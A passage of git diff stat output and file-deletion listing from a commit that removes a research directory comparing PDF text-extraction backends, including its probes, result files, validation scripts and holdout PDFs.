.../phase3/h07_paired_and_replication.py | 259 - .../phase3/h08_mupdf_precision_path.py | 133 - .../validation/phase3/pdfminer_extended.py | 116 - .../validation/phase3/pymupdf_extended.py | 125 - .../validation/phase3/raw_facts.py | 263 - .../phase3/results/h01_advance_semantics.json | 1116 - .../results/h02_pdfjs_percharacter.json | 248 - .../results/h03_cross_backend_scores.json | 1919 - .../results/h04_page_scale_agreement.json | 639 - .../results/h05_divergence_diagnosis.json | 759 - .../phase3/results/h06_raw_precision.json | 923 - .../results/h07_paired_and_replication.json | 253 - .../results/h08_mupdf_precision_path.json | 38 - .../results/v01_pymupdf_synthetic.json | 93 - .../results/v02_geometry_ceiling.json | 244 - .../results/v03_pdfium_rule_from_glyphs.json | 1670 - .../validation/results/v04_adjudication.json | 78 - .../validation/results/v04_blind.json | 366 - .../validation/results/v04_key.json | 1986 - .../validation/results/v04_key.sha256 | 1 - .../validation/results/v04_sample.sha256 | 1 - .../results/v04_sheets/sheet_01.png | Bin 49210 -> 0 bytes .../results/v04_sheets/sheet_02.png | Bin 46912 -> 0 bytes .../results/v04_sheets/sheet_03.png | Bin 50702 -> 0 bytes .../results/v04_sheets/sheet_04.png | Bin 60256 -> 0 bytes .../results/v04_sheets/sheet_05.png | Bin 45667 -> 0 bytes .../results/v04_sheets/sheet_06.png | Bin 41635 -> 0 bytes .../results/v04_sheets/sheet_07.png | Bin 55274 -> 0 bytes .../results/v04_sheets/sheet_08.png | Bin 52551 -> 0 bytes .../results/v04_sheets/sheet_09.png | Bin 56313 -> 0 bytes .../results/v04_sheets/sheet_10.png | Bin 39137 -> 0 bytes .../results/v04_sheets/sheet_11.png | Bin 33678 -> 0 bytes .../results/v04_sheets/sheet_12.png | Bin 46546 -> 0 bytes .../results/v04_sheets/sheet_13.png | Bin 64962 -> 0 bytes .../results/v04_sheets/sheet_14.png | Bin 59452 -> 0 bytes .../results/v04_sheets/sheet_15.png | Bin 46688 -> 0 bytes .../results/v04_sheets/sheet_16.png | Bin 46344 -> 0 bytes .../results/v04_sheets/sheet_17.png | Bin 35464 -> 0 bytes .../results/v04_sheets/sheet_18.png | Bin 52854 -> 0 bytes .../results/v04_sheets/sheet_19.png | Bin 30261 -> 0 bytes .../results/v04_sheets/sheet_20.png | Bin 35883 -> 0 bytes .../results/v04_sheets/sheet_21.png | Bin 36531 -> 0 bytes .../results/v04_sheets/sheet_22.png | Bin 47625 -> 0 bytes .../results/v04_sheets/sheet_23.png | Bin 49159 -> 0 bytes .../results/v04_sheets/sheet_24.png | Bin 35010 -> 0 bytes .../results/v05_boundary_scores.json | 916 - .../results/v06_generated_and_hyphen.json | 740 - .../validation/results/v07_line_seam.json | 85 - .../validation/results/v08_display_split.json | 65 - .../validation/results/v09_wasm_flags.json | 59 - .../validation/v01_pymupdf_synthetic.py | 142 - .../validation/v02_geometry_ceiling.py | 419 - .../validation/v03_pdfium_rule_from_glyphs.py | 472 - .../validation/v04_boundary_sample.py | 576 - .../validation/v05_score_boundaries.py | 263 - .../validation/v06_generated_and_hyphen.py | 417 - .../validation/v07_line_seam.py | 294 - .../validation/v08_display_split.py | 106 - .../validation/v09_wasm_flags.py | 118 - docs/research/staffer-delivery/README.md | 1095 - .../staffer-delivery/probes/README.md | 109 - .../probes/build_single_file.py | 162 - .../staffer-delivery/probes/dt_launcher.py | 103 - .../staffer-delivery/probes/exp1_imports.mjs | 63 - .../staffer-delivery/probes/exp1_xml_e2e.mjs | 124 - .../probes/exp_pdfjs_granularity.mjs | 49 - .../probes/native_baseline.py | 32 - .../probes/probe_static_app.py | 63 - .../probes/single-file/index.html | 82 - .../probes/static-app/index.html | 114 - .../probes/static-app/probe-worker.js | 1 - .../probes/static-app/probe.txt | 1 - pyproject.toml | 6 +- tests/data/p3/CPRT-119HPRT63305.pdf | Bin 209596 -> 0 bytes tests/data/p3/imageonly.pdf | Bin 412302 -> 0 bytes tests/data/p3/nongpo.pdf | Bin 16221 -> 0 bytes 330 files changed, 2 insertions(+), 323620 deletions(-) delete mode 100644 docs/research/pdf-backend-bakeoff/CLOSEOUT.md delete mode 100644 docs/research/pdf-backend-bakeoff/LICENSING.md delete mode 100644 docs/research/pdf-backend-bakeoff/PRE-REGISTRATION-CONFIRMATORY.md delete mode 100644 docs/research/pdf-backend-bakeoff/PRE-REGISTRATION.md delete mode 100644 docs/research/pdf-backend-bakeoff/README.md delete mode 100644 docs/research/pdf-backend-bakeoff/RED-TEAM.md delete mode 100644 docs/research/pdf-backend-bakeoff/RELEASE-READINESS.md delete mode 100644 docs/research/pdf-backend-bakeoff/RESULTS-CONFIRMATORY.md delete mode 100644 docs/research/pdf-backend-bakeoff/RESULTS-HYBRID.md delete mode 100644 docs/research/pdf-backend-bakeoff/RESULTS.md delete mode 100644 docs/research/pdf-backend-bakeoff/probes/.gitignore delete mode 100644 docs/research/pdf-backend-bakeoff/probes/README.md delete mode 100644 docs/research/pdf-backend-bakeoff/probes/backends/pdfium_hybrid.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/backends/pdfium_native.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/backends/pdfminer_backend.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/backends/pymupdf_backend.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/backends/pypdf_backend.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_bundle.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_egress.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_metrics.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_perf.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_sabotage.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_safe_failure.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_sensitivity.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/confirm_vs_production.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/contract.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/contract_hybrid.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/fetch_holdout.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/fill_results.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/gold_build.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/.gitignore delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_hybrid_wasm.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_wasm.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/dump_pdfjs.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/package.json delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/phase0_pdfjs.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/phase3_pyodide.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/phase5_fulldoc.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/phase5_perf.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/js/probe_wasm_textapi.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/probes/nocsp.html delete mode 100644 docs/research/pdf-backend-bakeoff/probes/phase0_speed.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/phase4_egress.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/phase4_webrtc.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/probe_charstream.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/probe_failure_headings.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/probe_hybrid_portability.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/probe_hybrid_signals.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/probe_normalize_raw.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/probe_space_separability.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/reconstruct.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/reconstruct_hybrid.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/redteam_ablation.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/redteam_csp_mitigation.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/redteam_egress2.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/redteam_unguarded.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/redteam_validate_amounts.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/report_confirmatory.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/report_phase1.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/report_phase2.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/requirements.txt delete mode 100644 docs/research/pdf-backend-bakeoff/probes/score_confirmatory.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/score_hybrid.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/score_migration.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/score_phase1.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/score_phase2.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/score_tierb.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/select_holdout.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/serve.py delete mode 100644 docs/research/pdf-backend-bakeoff/probes/vectors.js delete mode 100644 docs/research/pdf-backend-bakeoff/probes/vectors2.js delete mode 100644 docs/research/pdf-backend-bakeoff/probes/withcsp.html delete mode 100644 docs/research/pdf-backend-bakeoff/results/.gitignore delete mode 100644 docs/research/pdf-backend-bakeoff/results/DEVIATIONS.md delete mode 100644 docs/research/pdf-backend-bakeoff/results/HARNESS-VALIDATION.md delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_bundle.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_egress.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_isolation.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_p1.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_p1_report_repaired.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_p1_report_strict.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_p2.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_p2_report_repaired.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_p2_report_strict.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_perf.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_safe_failure.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_sensitivity.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/confirm_vs_production.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/gold_blind.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/gold_key.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/holdout_membership.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/hybrid_docs.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/hybrid_pairs.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/hybrid_portability.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/hybrid_wasm_entrypoints.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/migration_p1.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/migration_p2.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/phase1.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/phase2.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/phase3_pyodide.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/phase4.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/phase4_webrtc.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/phase5_fulldoc.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/phase5_perf.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/probe_backend_spacing.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/probe_failure_headings.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/probe_hybrid_signals.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/probe_normalize_raw.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/probe_normalize_raw_all.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/probe_separability.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/redteam_ablation.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/redteam_amount_validation.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/redteam_csp_mitigation.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/redteam_egress2.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/redteam_unguarded.json delete mode 100644 docs/research/pdf-backend-bakeoff/results/tierb.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/FINDINGS.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/PRESERVED-MANIFEST.txt delete mode 100644 docs/research/pdf-backend-bakeoff/validation/README.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/check_preservation.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/HARNESS-PLAN.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/PRE-EXECUTION-AMENDMENTS.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/PRE-REGISTRATION.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_00_delete_one_word.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_01_weld_two_words.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_02_split_one_word.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_03_delete_one_word.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_04_weld_two_words.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_05_split_one_word.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_06_delete_one_word.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/na_07_weld_two_words.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/nc_00_heading_free.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/nc_01_heading_free.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/nc_02_heading_free.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/control_fixtures/nc_03_heading_free.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/113-hr-933/eas.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/114-s-3001/pcs.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/115-hr-5961/rh.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/115-hr-6147/rh.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/115-hr-6157/eas.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/115-s-1609/pcs.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/115-s-2976/pcs.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/116-hr-7611/rh.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/116-hr-7617/rfs.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/117-hr-3237/eas.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/117-s-4663/is.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/119-hr-6938/enr.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/119-hr-7148/enr.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/119-hr-8469/pcs.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/CRPT-114HRPT215/CRPT-114HRPT215.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/CRPT-114HRPT605/CRPT-114HRPT605.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/holdout/CRPT-119HRPT632/CRPT-119HRPT632.pdf delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/adjudicator_prompt.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/anchor_provenance.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/build_frames.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/build_oracle.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/continuation_provenance.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/control_fixtures.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/cross_engine_control.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/decide_architecture.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/execute_study.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/m3_boundaries.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/m3_selftest.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/methodology_contracts.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/neutral_geometry.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/neutral_identity.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/oracle_geometry.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/pdfium_extended_corrected.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/reconstruct_extended_corrected.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/run_extended.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/run_hybrid.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/s1_control.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/score_metrics.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x00_design_pilot.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x01_contamination.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x02_oracle_reference_defects.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x03_select_holdout.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x04_freeze_check.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x05_design_exposure.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x07_neutral_geometry.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x08_neutral_identity.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x09_skeleton_cross_engine.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x10_reconstruction_signature.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x11_provenance_chain.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x12_skeleton_eligibility.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x13_x_arm.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x14_anchor_bridge.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x15_methodology_contracts.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x16_occurrence_identity.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x17_build_frames.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x18_start_x_discriminability.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x20_oracle_crop_coordinates.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x21_build_oracle.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x22_score_input_contract.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x23_control_fixtures.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x24_xml_source_bridge.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x25_bridge_validation.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x26_control_oracle.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x27_score_metrics.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x28_decide_architecture.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x29_execute_study.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x2_verify.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x30_continuation_boundary.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x30_labelling_fixture.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x31_dframe_budget_routes.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/x32_effective_routes.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/probes/xml_sources.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/CONTINUATION.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/DEVIATIONS.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/contamination.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/control_fixtures.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/design_exposure.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/design_runs/x03.log delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/design_runs/x03c.log delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/design_runs/x03d.log delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/design_runs/x03e.log delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/holdout_membership.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/x00_design_pilot.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/x02_oracle_reference_defects.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/x09_skeleton_cross_engine.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/x11_provenance_chain.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/x13_x_arm.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/x26_control_oracle.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/external-validity/results/x2_contract_assertions.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/FINDINGS-EXTENDED-GLYPH.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/contract_extended.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/g01_pdfium_advance_gate.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/g02_wasm_advance.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/g03_backend_fields.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/g04_score_boundaries.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/g05_failure_headings.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/g06_corpus_parity.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/g07_extraction_cost.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/pdfium_extended.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/reconstruct_extended.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/results/g01_pdfium_advance_gate.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/results/g02_wasm_advance.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/results/g03_backend_fields.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/results/g04_boundary_scores.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/results/g05_failure_headings.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/results/g06_corpus_parity.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase2/results/g07_extraction_cost.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/FINDINGS-CROSS-BACKEND.md delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h01_advance_semantics.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h02_pdfjs_percharacter.mjs delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h03_score_cross_backend.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h04_page_scale_agreement.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h05_diagnose_divergence.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h06_raw_precision.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h07_paired_and_replication.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/h08_mupdf_precision_path.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/pdfminer_extended.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/pymupdf_extended.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/raw_facts.py delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h01_advance_semantics.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h02_pdfjs_percharacter.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h03_cross_backend_scores.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h04_page_scale_agreement.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h05_divergence_diagnosis.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h06_raw_precision.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h07_paired_and_replication.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/phase3/results/h08_mupdf_precision_path.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v01_pymupdf_synthetic.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v02_geometry_ceiling.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v03_pdfium_rule_from_glyphs.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_adjudication.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_blind.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_key.json delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_key.sha256 delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sample.sha256 delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_01.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_02.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_03.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_04.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_05.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_06.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_07.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_08.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_09.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_10.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_11.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_12.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_13.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_14.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_15.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_16.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_17.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_18.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_19.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_20.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_21.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_22.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_23.png delete mode 100644 docs/research/pdf-backend-bakeoff/validation/results/v04_sheets/sheet_24.png delete mode 100644 